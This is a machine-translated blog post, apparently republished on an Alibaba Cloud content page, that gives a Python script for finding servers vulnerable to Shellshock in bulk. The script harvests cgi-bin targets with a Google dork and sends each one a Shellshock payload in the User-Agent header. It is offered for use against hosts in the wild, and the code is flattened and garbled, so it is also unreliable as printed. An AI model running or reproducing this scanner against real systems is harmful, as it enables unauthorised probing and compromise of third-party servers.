Bash Shellshock (bash Remote Code Execution) vulnerability bulk exploit script

Source: Internet
Author: User
Tags goagent
Bash remote code execution vulnerabilities are really much more powerful than heart drops, but the impact is not very broad, but yesterday's analysis of the article bash The Remote Code execution vulnerability analysis at the end of this paper mentions the bulk problem of the vulnerability.
One of the easiest ways to do this is to use the search engine's hacking technology, where I use the Google hacking syntax to link crawling with Google API. Only in the domestic words .... Need to add agent.
The agent in the program is my local goagent agent, the port is 8087. How to detect vulnerabilities is also very simple, I am here directly based on the server return code to judge.

The idea is these, the following is as usual, paste code:

#coding =utf-8 Import Requests import JSON import threading import Socket vul_res = [] class Googleurlprovider () : Def __init__ (self,pagecount,proxies): Self.pagecount = PageCount #查询的页数 self.keywords = R ' Inurl:cgi-bin filetype:sh ' Self.apiurl = ' https://ajax.googleapis.com/ajax/services/search/web ' self.proxies = proxies def getrequest (Self,url  ): Return Requests.get (Url,proxies=self.proxies,verify=false) def geturls (self): Ret_list = [] Tmp_list = [] for X in Xrange (0,self.pagecount): url = "{apiurl}?v=1.0&q={keywords}&rsz=8&start={pagecount}". Format ( apiurl=self.apiurl,keywords=self.keywords,pagecount=x) try:r = self.getrequest (URL) results = json.loads (r.te
						XT) If not results:continue infos = results[' responsedata ' [' Results '] if infos:for i in Infos: Tmp_list.append (i[' URL ')] except Exception, e:continue ret_list = ret_list + tmp_list return ret_list CLA SS Bashrcedetector (): Def __iniT__ (self,urls): self.urls = URL def detector (self): Global vul_res for X in Self.urls: #多线程执行 each = Eac Hworker (x) Each.start () each.join () ' Thread work class ' Class Eachworker (threading. Thread): Def __init__ (Self,url): Threading. Thread.__init__ (self) self.url = URL def run (self): global vul_res Useragent_header = {' User-agent ': ' () {1;} ;
				echo ' eee '} try:r = Requests.get (self.url,headers = useragent_header,timeout=8) If R.status_code = 500: print ' {URL} has Bash RCE vulnerability '. Format (url=self.url) vul_res.append (self.url) Else:pass except Soc
			Ket.timeout, E:pass except Requests.exceptions.Timeout, E:pass except Requests.exceptions.ConnectionError, E: Pass if __name__ = = ' __main__ ': print ' powered By:exploit qq:739858341 ' print ' This was a program which can use To scan the Bashrce vulnerability\nscanner working,please ... ' If Len (sys.argv)!= 2:print ' Usage:python bashrces Canner <googLe Pagecount> ' sys.exit () #goagent proxy #在这里修改, add your own agent to use proxies = {' http ': ' http://127.0.0.1:8087 ', ' https '  : "http://127.0.0.1:8087"} url_res = [] Vul_guys = [] Urlgetter = googleurlprovider (int (sys.argv[1)), proxies) url_res  = Urlgetter.geturls () Bash_detector = Bashrcedetector (url_res) bash_detector.detector () If Len (vul_res) = = 0:print  ' This group have no vulnerability ' else:print ' Find%d poor host (s) '% len (vul_res)


Run Screenshots:



Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.